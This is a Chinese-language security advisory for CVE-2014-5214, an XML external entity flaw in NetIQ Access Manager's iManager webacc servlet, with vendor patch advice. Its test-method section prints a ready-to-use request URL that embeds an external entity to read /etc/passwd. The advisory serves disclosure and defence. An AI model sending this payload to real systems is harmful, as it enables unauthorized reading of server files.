安全研究
安全漏洞
NetIQ Access Manager XML外部实体注入漏洞(CVE-2014-5214)
发布日期:2014-12-18
更新日期:2014-12-31
受影响系统:netiq NetIQ Access Manager < 4.0.1 HF3
描述:
CVE(CAN) ID:
CVE-2014-5214
NetIQ Access Manager是简单安全的Web访问解决方案。
NetIQ Access Manager (NAM) 4.0.1 HF3之前版本,Administration Console服务器中iManager nps/servlet/webacc在实现上存在安全漏洞,允许经过身份验证的远程novlwww用户通过包含xml外部实体声明及实体引用的查询参数,利用此漏洞读取任意文件。
<*来源:W. Ettlinger
链接:
http://www.securityfocus.com/archive/1/534280
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
https://<host>:8443/nps/servlet/webacc?taskId=fw.PreviewObjectFilter&nex
tState=initialState&merge=fw.TCPreviewFilter&query=<!DOCTYPE+request+[%0
a<!ENTITY+include+SYSTEM+"/etc/passwd">%0a]><query><container>%26include
%3b</container><subclasses>false</subclasses></query>
建议:
厂商补丁:
netiq
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm浏览次数:1691
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |